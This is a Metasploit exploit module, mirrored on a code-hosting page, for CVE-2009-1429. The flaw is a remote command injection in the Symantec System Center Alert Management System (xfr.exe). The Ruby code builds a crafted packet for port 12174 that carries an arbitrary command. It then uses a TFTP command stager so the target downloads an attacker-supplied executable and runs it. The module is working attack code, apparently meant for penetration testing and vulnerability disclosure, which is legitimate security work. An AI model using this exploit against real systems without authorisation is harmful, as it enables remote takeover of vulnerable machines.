Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/windows/antivirus/ams_xfr.rb
19612 views
1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5
6
class MetasploitModule < Msf::Exploit::Remote
7
Rank = ExcellentRanking
8
9
include Msf::Exploit::CmdStager
10
include Msf::Exploit::Remote::Tcp
11
include Msf::Exploit::EXE
12
13
def initialize(info = {})
14
super(
15
update_info(
16
info,
17
'Name' => 'Symantec System Center Alert Management System (xfr.exe) Arbitrary Command Execution',
18
'Description' => %q{
19
Symantec System Center Alert Management System is prone to a remote command-injection vulnerability
20
because the application fails to properly sanitize user-supplied input.
21
},
22
'Author' => [ 'MC' ],
23
'License' => MSF_LICENSE,
24
'References' => [
25
[ 'CVE', '2009-1429' ],
26
[ 'BID', '34671' ],
27
[ 'OSVDB', '54157' ],
28
[ 'ZDI', '09-060' ],
29
[ 'URL', 'http://www.symantec.com/business/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&suid=20090428_02' ]
30
],
31
'Targets' => [
32
[
33
'Windows Universal',
34
{
35
'Arch' => ARCH_X86,
36
'Platform' => 'win'
37
}
38
]
39
],
40
'CmdStagerFlavor' => 'tftp',
41
'Privileged' => true,
42
'Platform' => 'win',
43
'DefaultTarget' => 0,
44
'DisclosureDate' => '2009-04-28',
45
'Notes' => {
46
'Reliability' => UNKNOWN_RELIABILITY,
47
'Stability' => UNKNOWN_STABILITY,
48
'SideEffects' => UNKNOWN_SIDE_EFFECTS
49
}
50
)
51
)
52
53
register_options(
54
[
55
Opt::RPORT(12174),
56
OptString.new('CMD', [ false, 'Execute this command instead of using command stager', ""]),
57
]
58
)
59
end
60
61
def windows_stager
62
print_status("Sending request to #{datastore['RHOST']}:#{datastore['RPORT']}")
63
tftphost = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address : datastore['SRVHOST']
64
execute_cmdstager({ temp: '.', tftphost: tftphost })
65
@payload_exe = generate_payload_exe
66
67
print_status("Attempting to execute the payload...")
68
execute_command(@payload_exe)
69
end
70
71
def execute_command(cmd, opts = {})
72
connect
73
74
len = 2 + cmd.length
75
76
data = [0x00000000].pack('V')
77
data << len.chr
78
data << "\x00"
79
data << cmd + " "
80
data << "\x00"
81
82
sock.put(data)
83
84
res = sock.get_once
85
86
if (!res)
87
print_error("Did not received data. Failed?")
88
else
89
print_good("Got data, execution successful!")
90
end
91
92
disconnect
93
end
94
95
def exploit
96
unless datastore['CMD'].blank?
97
print_status("Executing command '#{datastore['CMD']}'")
98
execute_command(datastore['CMD'])
99
return
100
end
101
102
case target['Platform']
103
when 'win'
104
windows_stager
105
else
106
fail_with(Failure::Unknown, 'Target not supported.')
107
end
108
109
handler
110
end
111
end
112
113